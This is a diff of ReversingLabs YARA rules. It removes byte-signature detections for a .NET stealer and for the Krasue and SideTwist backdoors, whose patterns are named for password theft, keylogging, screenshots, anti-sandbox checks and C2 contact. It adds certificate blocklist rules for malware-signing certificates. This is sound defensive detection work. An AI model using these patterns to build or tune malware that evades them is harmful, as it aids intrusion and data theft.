-            ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 13 ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 38 ?? ?? ?? ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 6F ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ?? 06
-            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33
-            ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 11
-            ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            2C ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 09 7B ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 6F ?? ??
-            ?? ?? DC 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11
-        }
-		$take_screenshot = {
-            28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 73 ??
-            ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 16 16 06 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 06
-        }
-		$get_passwords = {
-            1F ?? 8D ?? ?? ?? ?? 25 16 73 ?? ?? ?? ?? A2 25 17 73 ?? ?? ?? ?? A2 25 18 73 ?? ??
-            ?? ?? A2 25 19 73 ?? ?? ?? ?? A2 25 1A 73 ?? ?? ?? ?? A2 25 1B 73 ?? ?? ?? ?? A2 25
-            1C 73 ?? ?? ?? ?? A2 25 1D 73 ?? ?? ?? ?? A2 25 1E 73 ?? ?? ?? ?? A2 25 1F ?? 73 ??
-            ?? ?? ?? A2 25 1F ?? 73 ?? ?? ?? ?? A2 25 1F ?? 73 ?? ?? ?? ?? A2 0A 73 ?? ?? ?? ??
-            25 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 06 0C 16 0D 2B
-            ?? 08 09 9A 13 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE
-            ?? 09 17 58 0D 09 08 8E 69 32 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
-            2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 6F ??
-            ?? ?? ?? 16 31 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28 ??
-            ?? ?? ?? 2D ?? DE ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 02 39 ?? ?? ??
-            ?? 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07 6F ??
-            ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D
-            ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ??
-            11 ?? 6F ?? ?? ?? ?? 16 31 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 26 DE ??
-            12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07
-        }
-		$process_key_action = {
-            03 28 ?? ?? ?? ?? 2C ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 02 7B ?? ?? ?? ?? 1A
-            8D ?? ?? ?? ?? 25 16 03 8C ?? ?? ?? ?? A2 25 17 04 8C ?? ?? ?? ?? A2 25 18 05 8C ??
-            ?? ?? ?? A2 25 19 07 A2 6F ?? ?? ?? ?? 26 2A 02 7B ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ??
-            0C 02 17 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 25
-            16 03 8C ?? ?? ?? ?? A2 25 17 04 8C ?? ?? ?? ?? A2 25 18 05 8C ?? ?? ?? ?? A2 25 19
-            08 A2 6F ?? ?? ?? ?? 26 2A 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 0D 2B ?? 09 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 02 11 ?? 16 9A A5 ?? ?? ??
-            ?? 11 ?? 17 9A A5 ?? ?? ?? ?? 11 ?? 18 9A A5 ?? ?? ?? ?? 11 ?? 19 9A 74 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 11 ?? 16 9A A5 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 03 04 11 ?? 19 9A 74
-            ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09
-            75 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 7B ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 0A 02 03 04 05 06 28
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enforcer Srl" and pe.signatures [ i ] . serial == "30:b4:ee:eb:d8:8f:d2:05:ac:c8:57:7b:ba:ed:86:55" and 1646179200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_B3391A6C1B3C6836533959E2384Ab4Ca : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "ab274ae3-0884-517a-a221-2c952fc9d74c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10624-L10642"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "38e38acfbfbf63b7179d2f8656f70224afa9269a7bdecd10ccbbbd92a6a216d3"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $get_tcp_connections ) or ( all of ( $get_operating_system_information_p* ) ) or ( $take_screenshot ) or ( $get_passwords ) or ( $process_key_action ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VERIFIED SOFTWARE LLC" and ( pe.signatures [ i ] . serial == "00:b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca" or pe.signatures [ i ] . serial == "b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca" ) and 1595462400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Backdoor_Krasue : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_05D50A0E09Bb9A836Ffb90A3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Krasue backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3187eebf-ef70-585f-85cf-5813025c785e"
-		date = "2024-03-04"
-		modified = "2024-03-04"
+		id = "f2e0959f-3bc6-5552-8f7a-f84672fb597d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Linux.Backdoor.Krasue.yara#L1-L127"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e2daa35ef9e0793062c9fb3bd8e4838e1e81ee3d228d8117b1c3b0e72eb8e151"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10644-L10660"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1bd1960cd6dd8bf83472dc2b1809b84ceb3db68a5e6c3ba68f28ad922230b2ed"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Krasue"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$switch_server = {
-            8B 05 ?? ?? ?? ?? FF C0 3B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 7C ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 48 63 05 ?? ?? ?? ?? 85 C0 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B
-            15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ??
-            ?? 89 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 66 89 15 ?? ?? 23 00 48 8B 04 C5 ?? ?? ?? ??
-            66 C7 05 ?? ?? 23 00 ?? ?? 8B 10 89 15 ?? ?? ?? ?? 66 8B 40 ?? 66 89 05 ?? ?? 23 00
-            C3
-        }
-		$get_hostname = {
-            41 55 41 54 31 F6 55 53 31 C0 BF ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            C0 0F 88 ?? ?? ?? ?? 48 89 E6 89 C7 89 C3 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 45 31 C9 31
-            FF 41 89 D8 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 89 EC 48 63 ED 48 89 EE E8 ?? ?? ?? ??
-            BE ?? ?? ?? ?? 48 89 C7 49 89 C5 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 48 63 D0 49 8D 74 15
-            ?? 8D 50 ?? 48 63 D2 44 39 E2 41 89 D0 7D ?? 48 FF C2 41 80 7C 15 ?? ?? 75 ?? 44 89
-            C1 41 FF C8 BA ?? ?? ?? ?? 29 C1 4D 63 C0 48 89 D7 83 E9 ?? 48 63 C9 F3 A4 41 C6 80
-            ?? ?? ?? ?? ?? 4C 89 EF 48 89 EE E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48 81 C4 ?? ??
-            ?? ?? 5B 5D 41 5C 41 5D C3
-        }
-		$start_server_p1 = {
-            41 57 41 56 31 D2 41 55 41 54 BE ?? ?? ?? ?? 55 53 89 FB BF ?? ?? ?? ?? 48 81 EC ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 05 ?? ?? ?? ?? 79 ?? 83 CF ?? E9 ?? ?? ?? ?? 48 8D
-            4C 24 ?? 41 B8 ?? ?? ?? ?? BE ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C7 C7 44 24 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 48 89 D7 F3 AB 31 FF 66 C7 05
-            ?? ?? 23 00 ?? ?? E8 ?? ?? ?? ?? 0F B7 FB 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ??
-            ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 66 89 05 ?? ?? 23 00 E8 ?? ?? ?? ?? 85 C0 78
-            ?? 4C 8D A4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D 74 24 ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 31 C9 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ??
-            ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 48 89 C3 0F 88 ?? ?? ?? ?? 31 C0 B9 ?? ?? ??
-            ?? 4C 89 E7 83 FB ?? F3 AB 7E ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ??
-            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 8D 08 31 C9 BA
-            ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? BE ?? ?? ?? ?? 4C 89
-            E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 05
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 DA BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 89
-            C2 8A 06 89 F5 44 29 E5 3C ?? 75 ?? 80 7E ?? ?? 75 ?? 48 83 C6 ?? EB ?? 3C ?? 75 ??
-            80 7E ?? ?? 75 ?? 41 B8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 4C 89 C7 4C 8B 05 ?? ?? ??
-            ?? F3 AB 8B 7E ?? 66 8B 4E ?? 4C 89 06 C6 06 ?? 45 31 C0 C6 46 ?? ?? BE
-        }
-		$start_server_p2 = {
-            66 C7 05 ?? ?? 23 00 ?? ?? 89 3D ?? ?? ?? ?? 66 89 0D ?? ?? 23 00 89 3D ?? ?? ?? ??
-            66 89 0D ?? ?? 23 00 48 89 F7 B9 ?? ?? ?? ?? 4C 89 E6 F3 AB E9 ?? ?? ?? ?? 85 ED 75
-            ?? 48 63 DD BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 01 E3 48 89 DF E8 ?? ?? ?? ?? 85 C0 75
-            ?? 48 8D 7B ?? E8 ?? ?? ?? ?? 6B C0 ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 EF 99 F7
-            F9 31 C0 E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 48 8D 54 24 ?? 48 98 85 C0 78 ?? 49 8B 0C 04
-            48 83 C2 ?? 48 83 E8 ?? 48 89 4A ?? C6 42 ?? ?? C6 42 ?? ?? EB ?? BA ?? ?? ?? ?? BE
-            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? 89 E9 4C 89 F6
-            89 2D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            48 89 C7 F3 A4 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2
-            AE 48 89 C8 48 F7 D0 48 8D 50 ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89
-            DF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 44
-            8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 4C 24 ?? 44 89 4C 24 ?? E8 ?? ?? ?? ?? 48 83
-            EC ?? 41 89 C0 BA ?? ?? ?? ?? 8B 4C 24 ?? 4C 89 EF BE ?? ?? ?? ?? 31 C0 51 8B 0D ??
-            ?? ?? ?? 41 57 53 44 8B 4C 24 ?? E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2 AE 48
-            83 C4 ?? 48 89 C8 48 F7 D0 48 8D 50 ?? 41 89 E8 4C 89 F1 4C 89 EE 8B 3D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8
-        }
-		$start_server_p3 = {
-            85 C0 75 ?? 31 FF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ??
-            ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ??
-            ?? ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 89 C7 E8 ?? ?? ?? ?? 45 85 FF 0F
-            85 ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 41 89 C4 75 ?? 8B
-            7C 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 4B ?? 45 31 C0 BA ?? ?? ??
-            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? E8
-            ?? ?? ?? ?? 8B 7C 24 ?? 48 8D B4 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            89 C3 7E ?? 4C 8D AC 24 ?? ?? ?? ?? 8D 04 2B 3D ?? ?? ?? ?? 7E ?? 8B 3D ?? ?? ?? ??
-            BA ?? ?? ?? ?? 48 8D 4C 24 ?? 4C 89 EE 29 EA 41 89 E8 49 81 C5 ?? ?? ?? ?? 81 EB ??
-            ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 48 8D 4C 24 ?? 41 89 E8 89 DA 4C 89
-            EE E8 ?? ?? ?? ?? EB ?? 31 F6 BA ?? ?? ?? ?? 44 89 E7 E8 ?? ?? ?? ?? 85 C0 0F 85
-        }
-		$send_encrypt = {
-            E8 ?? ?? ?? ?? 41 8D 7E ?? 49 89 C5 48 63 FF E8 ?? ?? ?? ?? 48 63 54 24 ?? 48 89 C7
-            4C 89 FE 48 8D 0C 13 C6 04 08 ?? 89 D1 48 01 C2 F3 A4 48 89 D7 48 89 EE 48 89 D9 44
-            89 F2 F3 A4 48 89 C6 EB ?? 8D 7B ?? 48 63 FF E8 ?? ?? ?? ?? 89 DA 49 89 C5 48 89 EE
-            4C 89 EF E8 ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 4C 89 EE 44 89 E7 48 63 D0 41 B8 ?? ??
-            ?? ?? 31 C9 E8 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
-		$notify_server = {
-            48 81 EC ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 48 89 E0 85 D2 7E ?? BE ?? ?? ?? ?? 89 D1 48
-            89 E7 F3 A4 48 63 D2 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 4C 8D 04 10 41 B9 ?? ?? ?? ?? 48
-            83 C2 ?? 4C 89 C7 41 B8 ?? ?? ?? ?? F3 A4 8B 3D ?? ?? ?? ?? 48 89 C6 E8 ?? ?? ?? ??
-            8B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toliz Info Tech Solutions INC." and pe.signatures [ i ] . serial == "05:d5:0a:0e:09:bb:9a:83:6f:fb:90:a3" and 1643892810 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0A2787Fbb4627C91611573E323584113 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "64848927-6a60-5ea9-bae5-7d15c3f35ca6"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10662-L10678"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "efa352beafb56b95a89554bc8929f8e01a4da46eef1f6cf8a1487a2a06bc1b3e"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $switch_server ) and ( $get_hostname ) and ( all of ( $start_server_p* ) ) and ( $send_encrypt ) and ( $notify_server )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "exxon.com" and pe.signatures [ i ] . serial == "0a:27:87:fb:b4:62:7c:91:61:15:73:e3:23:58:41:13" and 1640822400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Backdoor_Sidetwist : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1D36C4F439D651503589318F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects SideTwist backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "979b442e-8739-54a8-b486-39fc5673791e"
-		date = "2024-03-18"
-		modified = "2024-03-18"
+		id = "f72b8e2c-b799-5aec-a69a-e42cdb3e2ae1"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Win64.Backdoor.SideTwist.yara#L1-L154"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "811fa73ede59493c71435743848a3fce3a1604ec4065ffcb0b43e9715dfa5c31"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10680-L10696"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "73dc3c01041d50100a8d5519afe1a80f470c30175f9ad1bf76ac287ac199a959"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "SideTwist"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$anti_sandbox_detect_environment = {
-            55 57 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 89 4D ?? 48 89 55 ?? E8 ??
-            ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 55 ?? 48 8D 45 ?? 4C
-            8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 75 ?? 48 8B 45 ?? 48 85
-            C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48
-            89 C1 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8D 4D ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ??
-            ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
-            D0 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
-            D0 BB ?? ?? ?? ?? BE ?? ?? ?? ?? EB
-        }
-		$collect_host_information = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? C7 45 ??
-            ?? ?? ?? ?? 8B 45 ?? 89 C0 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 39 C2 72 ?? 48 01 C0 48
-            89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48
-            8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ??
-            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 89 C2 B9 ??
-            ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8B 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8
-            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            89 C2 48 8D 4D ?? 48 8D 45 ?? 49 89 C9 49 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ??
-            48 8D 55 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ??
-            48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ??
-            48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 15 ??
-            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89
-            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89
-            C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D
-            45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
